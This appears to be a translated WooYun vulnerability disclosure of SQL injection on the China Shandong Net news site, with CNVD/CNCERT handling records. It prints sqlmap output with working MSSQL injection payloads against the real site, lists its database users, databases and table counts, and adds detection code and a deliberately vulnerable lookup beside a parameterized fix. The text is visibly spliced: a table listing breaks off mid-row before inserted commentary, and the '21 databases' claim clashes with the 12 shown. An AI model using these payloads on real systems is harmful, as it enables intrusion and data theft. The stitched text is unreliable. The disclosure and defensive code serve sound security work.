Vulnerability summary
Vulnerability title: Multiple SQL injections on the 中国山东网 (China Shandong Net) main site (21 databases can be dumped / user information / large volumes of records exposed)
Submitted: 2015-12-08 00:32
Fixed: 2016-01-23 15:16
Published: 2016-01-23 15:16
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: handed to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling
Tags:
None
Vulnerability details
Disclosure status:
2015-12-08: Details sent to the vendor; awaiting vendor processing
2015-12-11: Vendor has confirmed; details disclosed to the vendor only
2015-12-21: Details disclosed to core white hats and relevant domain experts
2015-12-31: Details disclosed to ordinary white hats
2016-01-10: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public
Brief description:
All 21 databases can be dumped, a large number of records can be leaked, and the user credentials of several sub-sites can also be exposed.
Detailed description:
Please mask the URLs!~~~
中国山东网 (**.**.**.**) is a national key news website established with the approval of the State Council Information Office. It is supervised by the Information Office of the Shandong Provincial People's Government, hosted by 走向世界杂志社 (Going to the World magazine), planned and operated by 新之航传媒集团山东网新传媒有限公司, and went live in 1996.
Injection point one: an interface found while capturing traffic
Injection point two:
The ID parameter is injectable; check the other similar topic pages yourselves!~~~
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=220748 AND 7555=7555&Page=5
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=220748 AND 8874=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(99)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8874=8874) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113)))&Page=5
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: ID=(SELECT CHAR(113)+CHAR(97)+CHAR(99)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (6663=6663) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113))&Page=5
---
[19:26:07] [INFO] testing Microsoft SQL Server
[19:26:07] [INFO] confirming Microsoft SQL Server
[19:26:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:26:08] [INFO] fetching current user
[19:26:08] [INFO] retrieved: idollar
current user: 'idollar'
[19:26:08] [INFO] fetching current database
[19:26:09] [INFO] retrieved: SDSW20_News
current database: 'SDSW20_News'
[19:26:09] [INFO] testing if current user is DBA
current user is DBA: False
------------------------------------------------------------
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=228609 AND 3840=3840&Page=6
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=228609 AND 8374=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHAR(102)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8374=8374) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(118)+CHAR(99)+CHAR(113)))&Page=6
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ID=228609; WAITFOR DELAY '0:0:5'--&Page=6
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ID=228609 WAITFOR DELAY '0:0:5'--&Page=6
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: ID=(SELECT CHAR(113)+CHAR(108)+CHAR(102)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (5568=5568) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(118)+CHAR(99)+CHAR(113))&Page=6
---
[19:59:39] [INFO] testing Microsoft SQL Server
[19:59:39] [INFO] confirming Microsoft SQL Server
[19:59:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:59:39] [INFO] fetching current user
[19:59:40] [INFO] retrieved: idollar
current user: 'idollar'
[19:59:40] [INFO] fetching current database
[19:59:40] [INFO] retrieved: SDSW20_News
current database: 'SDSW20_News'
[19:59:40] [INFO] testing if current user is DBA
current user is DBA: False
database management system users [2]:
[*] idollar
[*] sa
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
Database: SDSW20_Main
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.TB_SysLog | 103482 |
| dbo.[!FS_News] | 25719 |
| dbo.TU_User | 3734 |
| dbo.TC_Area | 3525 |
| dbo.TE_Agent | 1831 |
| dbo.tb_SiteToFriendLink | 529 |
| dbo.TB_FunCodes | 420 |
| dbo.TB_Columns | 337 |
| dbo.TC_SysFunctions | 240 |
| dbo.TB_FriendLink | 218 |
| dbo.tb_PublishTo | 163 |
| dbo.TU_AdminBBS | 134 |
| dbo.aspnet_UsersInRoles | 131 |
| dbo.vw_aspnet_UsersInRoles | 131 |
| dbo.tab_webchat | 108 |
| dbo.TC_Degree | 99 |
| dbo.TB_ShortCut | 76 |
| dbo.aspnet_Users | 65 |
| dbo.vw_aspnet_Users | 65 |
| dbo.aspnet_Membership | 64 |
| dbo.vw_aspnet_MembershipUsers | 64 |
| dbo.TC_ColumnType | 59 |
| dbo.TU_Admin | 56 |
| dbo.TB_Sites | 29 |
| dbo.TC_Nodes | 26 |
| dbo.TC_SysModules | 26 |
| dbo.aspnet_Roles | 24 |
| dbo.TB_SWRoles | 24 |
| dbo.TC_BulletinPosition | 24 |
| dbo.vw_aspnet_Roles | 24 |
| dbo.[!FS_NewsClass] | 16 |
| dbo.TB_FaceImg | 16 |
| dbo.TB_Config | 9 |
| dbo.TB_FriendLinkToGroup | 9 |
| dbo.TB_Tables | 8 |
| dbo.TB_SiteToGroup | 7 |
| dbo.TB_WorkLog | 7 |
| dbo.TC_DegreeGroup | 7 |
| dbo.TC_UserDegree | 7 |
| dbo.TC_UserEducation | 7 |
| dbo.aspnet_SchemaVersions | 6 |
| dbo.TC_UserRelation | 5 |
| dbo.TC_UserStatus | 5 |
| dbo.TU_Volunteer | 5 |
| dbo.TB_SWRolesSpecialColumn | 4 |
| dbo.TB_Channels | 3 |
| dbo.TB_WorkLog_backup | 3 |
| dbo.tb_SitesToExpertsCatogry | 2 |
| dbo.TU_Expert | 2 |
| dbo.TU_UserSpace | 2 |
| dbo.aspnet_Applications | 1 |
| dbo.TC_AccessChar | 1 |
| dbo.TC_AgentType | 1 |
| dbo.TU_UserAsk | 1 |
| dbo.TU_UserBBS | 1 |
| dbo.TU_UserDigg | 1 |
| dbo.vw_aspnet_Applications | 1 |
+--------------------------------------------------+---------+
Database: SDSW20_News
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.NW_NewsAppend | 3104685 |
| dbo.NW_NewsInfo | 2951443 |
| dbo.vw_NewsInfo | 2892701 |
| dbo.vw_NewsInfo_List | 2892687 |
| dbo.vw_NewsInfoRI | 2892687 |
| dbo.NewsLog | 835816 |
| dbo.Photo_Clicks | 163445 |
| dbo.NW_VotesData | 126723 |
| dbo.gData_News | 109257 |
| dbo.s_OperaLog | 17369 |
| dbo.lh_Reply | 13306 |
| dbo.lh_LivelihoodInfo | 9022 |
| dbo.FS_News | 8147 |
| dbo.NW_SpecialTopic | 7155 |
| dbo.NW_NewsRemarks | 6585 |
| dbo.t_sys_r_GroupMenu | 3495 |
| dbo.t_sys_Menu | 2910 |
| dbo.NW_Sdview | 1855 |
| dbo.vw_SdView | 1844 |
| dbo.vw_SdViewRI | 1844 |
| dbo.TC_NewsCatogry | 1712 |
| dbo.t_sys_r_UserGroup | 1317 |
| dbo.gData_Setting | 1168 |
| dbo.NW_MsInfo | 1020 |
| dbo.TC_NewsCatogry0 | 844 |
| dbo.Photo_Pic
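The sqlmap listings above quote payloads built from chains of CHAR() calls, which hide what is actually being sent to the server. The Python below is an added example, not part of the report and not sqlmap's code: it decodes those chains (exposing sqlmap's random five-letter marker strings), labels each probe with the technique sqlmap reported for it, and walks through the error-based round trip: the injected CASE yields '1' or '0', the server concatenates it between the two markers, CONVERT(INT, ...) fails, and the conversion error message carries the value back to the client. The IIS-style log lines, IP addresses, timestamps, the path /topic.aspx and the wording of the error message are constructed (the report masks the real URL); only the payloads are taken from the output above.

```python
"""Decode and triage the sqlmap probes quoted in the report (added example, not from the report or sqlmap)."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed IIS W3C-style lines: date time s-ip method cs-uri-stem cs-uri-query sc-status time-taken(ms).
# Path, addresses and timings are made up; the cs-uri-query values are the report's payloads, URL-encoded.
SAMPLE_LOG = """\
2015-12-07 19:26:05 10.0.0.5 GET /topic.aspx ID=220748&Page=5 200 31
2015-12-07 19:26:06 10.0.0.5 GET /topic.aspx ID=220748+AND+7555%3D7555&Page=5 200 35
2015-12-07 19:26:07 10.0.0.5 GET /topic.aspx ID=220748+AND+8874%3DCONVERT(INT,(SELECT+CHAR(113)%2BCHAR(97)%2BCHAR(99)%2BCHAR(103)%2BCHAR(113)%2B(SELECT+(CASE+WHEN+(8874%3D8874)+THEN+CHAR(49)+ELSE+CHAR(48)+END))%2BCHAR(113)%2BCHAR(120)%2BCHAR(107)%2BCHAR(107)%2BCHAR(113)))&Page=5 500 40
2015-12-07 19:59:38 10.0.0.5 GET /topic.aspx ID=228609%3B+WAITFOR+DELAY+'0%3A0%3A5'--&Page=6 200 5044
2015-12-07 19:59:39 10.0.0.5 GET /topic.aspx ID=(SELECT+CHAR(113)%2BCHAR(108)%2BCHAR(102)%2BCHAR(103)%2BCHAR(113)%2B(SELECT+(CASE+WHEN+(5568%3D5568)+THEN+CHAR(49)+ELSE+CHAR(48)+END))%2BCHAR(113)%2BCHAR(119)%2BCHAR(118)%2BCHAR(99)%2BCHAR(113))&Page=6 200 38
"""

CHAR_CHAIN = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*", re.IGNORECASE)


def decode_char_chains(sql: str) -> str:
    """Replace each CHAR(n)+CHAR(m)+... chain with the quoted literal it builds on the server."""
    def to_literal(m):
        return "'" + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))) + "'"
    return CHAR_CHAIN.sub(to_literal, sql)


# Fingerprints of the five techniques sqlmap reported above, matched against the decoded query string.
TECHNIQUES = [
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("error-based", re.compile(r"CONVERT\(\s*INT\s*,", re.I)),
    ("stacked queries", re.compile(r";\s*WAITFOR\s+DELAY", re.I)),
    ("time-based blind", re.compile(r"(?<!;)\s+WAITFOR\s+DELAY", re.I)),  # no ';' before it
    ("inline query", re.compile(r"^\w+=\(SELECT\b", re.I)),
]


def classify(decoded_query: str) -> List[str]:
    return [name for name, rx in TECHNIQUES if rx.search(decoded_query)]


def triage(log_text: str) -> List[Dict]:
    """One finding per log line whose query string matches a technique fingerprint."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        date, time, _sip, _method, stem, query, status, taken = line.split()
        decoded = decode_char_chains(unquote_plus(query))
        labels = classify(decoded)
        if labels:
            findings.append({"time": date + " " + time, "stem": stem, "status": int(status),
                             "time_taken_ms": int(taken), "techniques": labels, "decoded": decoded})
    return findings


def markers_in(decoded_query: str) -> Optional[Tuple[str, str]]:
    """sqlmap wraps the value it extracts in two random five-letter markers; find them in a decoded payload."""
    literals = re.findall(r"'([a-z]{5})'", decoded_query)
    return (literals[0], literals[-1]) if len(literals) >= 2 else None


def mssql_convert_int_error(value: str) -> str:
    """Constructed imitation of the SQL Server error raised by CONVERT(INT, <non-numeric string>)."""
    return "Conversion failed when converting the nvarchar value '%s' to data type int." % value


def server_evaluates(decoded_query: str) -> Optional[str]:
    """Stand-in for the database: evaluate the injected CASE, concatenate marker+result+marker, fail the CONVERT."""
    case = re.search(r"CASE WHEN \((\d+)=(\d+)\) THEN '(\d)' ELSE '(\d)' END", decoded_query)
    markers = markers_in(decoded_query)
    if not case or not markers:
        return None
    a, b, then_, else_ = case.groups()
    return mssql_convert_int_error(markers[0] + (then_ if a == b else else_) + markers[1])


def read_marked_value(error_text: str, prefix: str, suffix: str) -> Optional[str]:
    """What sqlmap does with the error page: read whatever sits between its two markers."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text)
    return m.group(1) if m else None


def confirm_error_based(decoded_query: str) -> Optional[str]:
    """Full round trip for one error-based probe: '1' means the injected condition held on the server."""
    error_text = server_evaluates(decoded_query)
    markers = markers_in(decoded_query)
    return read_marked_value(error_text, *markers) if error_text and markers else None


if __name__ == "__main__":
    findings = triage(SAMPLE_LOG)
    for f in findings:
        print(f["time"], f["status"], "%5d ms" % f["time_taken_ms"], f["techniques"])
        print("    ", f["decoded"])
    probe = [f for f in findings if "error-based" in f["techniques"]][0]
    print("error-based oracle returned:", confirm_error_based(probe["decoded"]))
```

Decoded, the first error-based payload reads `... SELECT 'qacgq'+(SELECT (CASE WHEN (8874=8874) THEN '1' ELSE '0' END))+'qxkkq' ...`: once a true condition comes back as `qacgq1qxkkq` inside a conversion error, sqlmap replaces the CASE with a SUBSTRING over any query it likes, which is how the database names and table counts above were pulled out one chunk at a time. For detection, the strongest signals in the lines above are the five-letter marker pairs and CONVERT(INT, ...) in a numeric parameter, the 500 status on the error-based probe, and a time-taken that jumps to about 5000 ms on the WAITFOR DELAY probes.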
Proof of vulnerability:
Fix recommendation:
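The report leaves the fix section empty. The following is an added example, not the site's code: it shows the shape the findings above imply (the GET parameter ID pasted into the SQL text) next to the parameterized form, driven by the report's own boolean-based payloads. The site runs ASP.NET 2.0 on SQL Server 2008, where the same fix is a SqlCommand with a typed SqlParameter; this stand-in uses Python's sqlite3 so it runs offline. The table name NW_SpecialTopic is taken from the listing above, but its columns and rows are constructed.

```python
"""Concatenated ID lookup beside the parameterized fix (added example, not the site's code)."""
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for SDSW20_News; the columns and rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE NW_SpecialTopic (ID INTEGER PRIMARY KEY, Title TEXT)")
    conn.executemany("INSERT INTO NW_SpecialTopic VALUES (?, ?)",
                     [(220748, "topic 220748"), (228609, "topic 228609")])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> List[str]:
    """The parameter becomes part of the statement, so 'ID=220748 AND 7555=7555' and
    'ID=220748 AND 7555=7556' return different pages: the boolean oracle sqlmap found."""
    sql = "SELECT Title FROM NW_SpecialTopic WHERE ID=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn: sqlite3.Connection, raw_id: str) -> Optional[List[str]]:
    """Check the type at the boundary, then bind the value. The driver ships the statement text and
    the value separately, so no payload can change the query; None means 'answer HTTP 400'."""
    try:
        topic_id = int(raw_id)
    except ValueError:
        return None
    sql = "SELECT Title FROM NW_SpecialTopic WHERE ID=?"
    return [row[0] for row in conn.execute(sql, (topic_id,))]


if __name__ == "__main__":
    db = make_db()
    for payload in ("220748", "220748 AND 7555=7555", "220748 AND 7555=7556", "220748 OR 1=1"):
        print("%-22s vulnerable=%-32s hardened=%s"
              % (payload, vulnerable_lookup(db, payload), hardened_lookup(db, payload)))
```

Binding the value fixes the injection; the blast radius shown above is a separate problem. The output lists the application login idollar as not DBA yet able to enumerate 12 databases, including SDSW20_Main with its aspnet_Membership and TU_User tables, so the login should be scoped to the one database the news pages need, with read-only rights there. That sa appears in the user list is worth a separate check of whether it is enabled and how it is protected.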
Copyright notice: please credit the source when reposting: 路人甲@乌云
Vulnerability response
Vendor response:
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-12-11 17:01
Vendor reply:
CNVD has confirmed and reproduced the described situation; it has been passed to CNCERT for forwarding to the Shandong branch centre, which will coordinate handling with the website's operating unit.
Latest status:
None yet